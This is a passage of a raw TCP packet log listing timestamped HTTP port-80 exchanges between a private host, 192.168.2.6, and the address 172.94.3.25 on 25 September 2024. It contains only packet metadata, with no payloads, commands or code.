                                        Sep 25, 2024 18:40:30.586920023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.586937904 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587093115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587105989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587142944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587239027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587251902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587265015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587277889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587291002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587318897 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587414980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587429047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587441921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587452888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587455034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587482929 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587569952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587583065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587594986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587605953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587613106 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587618113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587631941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587637901 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587665081 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587843895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587857008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587869883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587882996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587888002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587893963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587905884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587908030 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587924957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587930918 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587937117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587950945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587963104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587973118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.587976933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.587995052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588002920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588007927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588016033 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588078022 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588203907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588217020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588229895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588242054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588253021 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588253975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588269949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588283062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588310957 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588335991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588524103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588536978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588551998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588562965 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588563919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588576078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588587999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588593006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588606119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588614941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588618040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588629961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588640928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588649035 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588665009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588665962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588676929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588689089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588701010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588718891 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588742018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588856936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588870049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588881016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588895082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.588896990 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.588931084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589032888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589046955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589061022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589071989 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589101076 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589224100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589236975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589248896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589272976 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589400053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589413881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589425087 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589437008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589442968 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589468002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589582920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589595079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589607954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589618921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589621067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589631081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589642048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589649916 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589653969 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589667082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589668989 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589696884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589755058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589771032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589782000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589795113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589804888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589804888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589817047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589829922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589833021 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589842081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589847088 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589854956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.589884043 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.589907885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590086937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590099096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590112925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590142012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590267897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590280056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590293884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590305090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590308905 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590315104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590326071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590326071 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590338945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590362072 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590373993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590495110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590507984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590518951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590532064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590543985 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590543985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590557098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590569019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590578079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590580940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590594053 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590595007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590609074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590621948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590626955 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590635061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590646982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590652943 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590658903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590677023 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590677977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590692043 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.590821028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.590861082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591039896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591053009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591068029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591080904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591093063 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591120005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591198921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591211081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591223001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591248989 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591382027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591418028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591429949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591435909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591442108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591454029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591465950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591465950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591479063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591494083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591495991 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591520071 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591523886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591536045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591547012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591558933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591567993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591594934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591696978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591711998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591723919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591737032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591742039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591748953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591762066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591768026 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591774940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.591801882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.591819048 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.592696905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592709064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592719078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592731953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592745066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592755079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.592776060 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.592850924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592863083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592875004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592886925 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.592889071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592900991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592912912 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592916965 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.592925072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592937946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.592945099 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.592963934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.593007088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.593019009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.593029022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.593039989 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.593040943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.593055010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.593058109 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.593067884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.593087912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.593157053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.593168974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.593183994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.593190908 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.593219042 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.788867950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794035912 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794125080 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794178009 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794188023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794240952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794270992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794282913 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794303894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794337034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794344902 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794390917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794425964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794434071 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794459105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794492006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794495106 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794523954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794565916 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794574976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794608116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794641018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794648886 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794703007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794747114 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794754028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794791937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794823885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794833899 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794857025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794892073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794894934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.794943094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.794976950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.795005083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.795010090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.795042038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.795053005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.795074940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.795108080 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.795115948 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.795140028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.795172930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.795183897 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.795224905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.795260906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.795267105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798186064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798253059 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798257113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798293114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798329115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798353910 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798362970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798394918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798403978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798429012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798470974 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798480034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798513889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798546076 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798557043 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798579931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798612118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798620939 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798645020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798677921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798683882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798712015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798748970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798753977 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798782110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798821926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798821926 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798856020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798888922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798897982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.798922062 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798974037 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.798974991 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799009085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799041033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799051046 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799074888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799108028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799122095 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799161911 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799194098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799202919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799228907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799261093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799267054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799314022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799350023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799357891 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799406052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799462080 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799478054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799513102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799545050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799555063 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799587965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799632072 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.799645901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.799679041 CEST8049716172.94.3.25192.168.2.6
